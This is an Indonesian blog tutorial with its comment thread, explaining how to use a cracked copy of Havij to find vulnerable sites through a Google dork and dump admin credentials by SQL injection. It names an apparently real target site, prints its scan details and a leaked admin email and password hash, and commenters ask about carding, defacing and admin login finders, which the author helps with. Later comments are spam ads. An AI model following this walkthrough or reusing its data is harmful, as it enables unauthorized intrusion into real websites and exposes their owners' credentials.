Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :
Pertama, cari target lewat google dork.
Google Dork : inurl:”pages.php?id=”
Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15
Maka kita akan mendapat data-data sebagai berikut :
Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I’m IDLE
Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse
Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables
Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns
Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut :
Data Found: admin_id,admin_email,admin_pass=1^[email protected]^f97c5d29941bfb1b2fdab0874906ab82
Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data
Naufal Hanif Rabbani says
keren sob 🙂
chiaki says
Thanks kawan. . .
ilham bagus says
itu wajib ada pages.php?id=15 ya bro???
BlogS of Hariyanto says
waduh…lagi-lagi saya hanya bisa duduk manis mencoba menyimak aoa yang tertulis disini 🙂
chiaki says
Oke sobat. . .
putra says
ini pasti di forum itu tuh .. heheh… saya kemarin tau yang seperti ini soalnya 😀
chiaki says
Kalo ini sih di semua forum ada. Basic nya. Hehehe
Alt-Amiend says
menyapa pagi kesini kawan….
chiaki says
Thanks kawan. . .
Imtikhan.Com says
patut dipelajari sob
izin simpan ya 🙂
chiaki says
Iya kawan. . .
Masnady says
wah saya suport saja dech sobat, masih belum paham beginian nih.. ntr kalau saya dah beli kompi, saya minta ajarin beginian sama sobat..
awas ya kalau nggak mau ngajarin hahahahahahaha
chiaki says
:v
Brebes VS Lamongan says
met pagi nyimak bang soalnya belom punya tuh programnya hehehe
chiaki says
Di artikel sebelumnya ada. :v
budi os 19 says
mantabbb nih sobat…kash infonya 🙂
lanjuttt kan…hehe
chiaki says
Thanks kawan. . .
Rohis Facebook says
aduh ampun.., lengkap banget sob… *smile
chiaki says
:v
Bung Penho says
waduh makin membingungkan yud. tetapi oke buat pelajaran baru nih!
chiaki says
Hehehe. Ini mah baru basic.
Lanonadio says
pusing mas sumpah hehehe
chiaki says
:v
Ipnul Haq says
Bro boleh tau gmail kamu gak bro? Biar aku bisa kontak kamu bro tutorial carding lebih lanjut
Ilmu Dunia dan Akhirat says
saya coba dulu ya gan defacenya.. 🙂
Andika yuda pratama says
bang kan ane udh dapet pass nya, nyari tempat admin login dimana ???
chiaki says
Pake admin finder bro
Dedy muswar says
waktu encrypt pass gk bisa gan hasilnya masih bil hash
Majalah Siantar says
mantaplah, tapi ga semua web bisa dijeboll
chiaki says
Yang bilang semua siapa ?
Koh Lee Van Djocdja says
Lanjutkan pakde….. 🙂
Sekedar Info says
admin loginnya ada dimana gan ????
#bingung tingkat dewa neh…
Tiooo says
Biar tau itu web bisa di hack darimananya min?
~uchanet~ says
gan biasanya klo ngak nemu db (unknown) itu apanya yah…
Anonim says
md5 hash ya… yg masalah kalo password nya tdk ada dalam hash :v
Seftian says
makasih bang yuyud..
ane seftian.. yang dlu..
tp keren.. gw salut, soalnya ini d bahas secara detail (y)
Anonim says
bang cara login pke usernamenya gimana?
kan kita cuma punya emailnya
Anonim says
wani piro xixixixixixixixixi
Anonim says
copas beroh
sumber tercantum :3
optimizer jakarta says
test ah 🙂
Anonim says
ka tolong bantu gmn cara kita tau pages.php?id=15 saya udh cari di google dork ga ada terus saya coba ganti dengan angka lain ketika di analyze eror 404.jd gmn cara kita tau php?id suata website .thanks before
Anonim says
greattttt men
Azmi Hauzan Hazairin says
ko saya ada TULISAN
"Component 'tabctl32.ocx' blablablablablablablablablablablablablablablablablablablablablablablablabla
shinta says
"run as administrator" gan
Mahfud says
kenapa tu bang halaman depan printscreen kok ada tulisan merah madura ciber. kenapa gambar yg lain kok gak ada.
jangan2 abang juga Copas
Tilis Tiadi says
gan klw yang ini /pages.php?id=15 maksudnya apanya tuh gan?
trus klw cara ngedapetinnya gimana? mohon bimbingannya gan. (newbie)
Anonim says
F*ck lu copas punya web orang
chiaki says
gw copas dimana njing jawab
Anonim says
Oh my goodness! Incredible article dude! Many thanks, However I am encountering problems with your RSS.
I don't understand the reason why I am unable to join it.
Is there anybody else getting the same RSS problems? Anyone that knows the
answer can youu kindky respond? Thanks!!
Stop byy myy website :: post divorce advice for men
Ahmad Wahyudin says
segera miliki rumah tahan gempa desain klasik, menarik dgn suasana pedesaan yang eksotik. tersedia berbagai macam model
rumah jawa seperti
rumah joglo
rumah limasan
rumah kampung. kami juga menjual
gebyok kayu jati lawas
ahmad wahyudin says
jangan biarkan kulit keriput, jerawat dan bisul-bisul mengganggu penampilan anda, segera obati dengan gluta drink.
manfaat susu gluta drink sudah terbukti nyata dan gluta drink yang asli hanya bisa anda dapatkan di
distributor gluta drink yogyakarta
Anonim says
Waspada kanker serviks! jangan anggap sepele masalah keputihan anda, bisa jadi keputihan yang berlebih adalah gejala kanker serviks.
berikut ini adalah cara mengobati keputihan dengan crystal x asli.
JbdcRoony says
viagra for sale online buying viagra in uk online buy viagra in sydney australia http://llviabest.com/ – buying viagra online using pay pal ’
n0t1m3 says
mau tanya nih bro kok di bagian menu tabels nya nggak bisa kebuka ya, gimana ya caranya?
jasa bangun rumah says
Layanan Bangun dan Renovasi Rumah All-in-One
Limasanjati.id menawarkan solusi bangun dan renovasi rumah Joglo dan rumah Limasan All-in-One yang hemat waktu dan biaya.
Tim profesional kami akan menangani semua proses dari awal hingga akhir, mulai dari perencanaan, pembuatan desain, pengadaan material, pembangunan, hingga penyelesaian dan terima kunci.
Dengan layanan ini, Anda hanya perlu berurusan dengan satu pihak untuk semua kebutuhan bangun dan renovasi rumah Anda, sehingga alur proyek lebih optimal, efisien, tepat waktu, terhindar dari miskomunikasi dan kerumitan yang menghambat pengerjaan.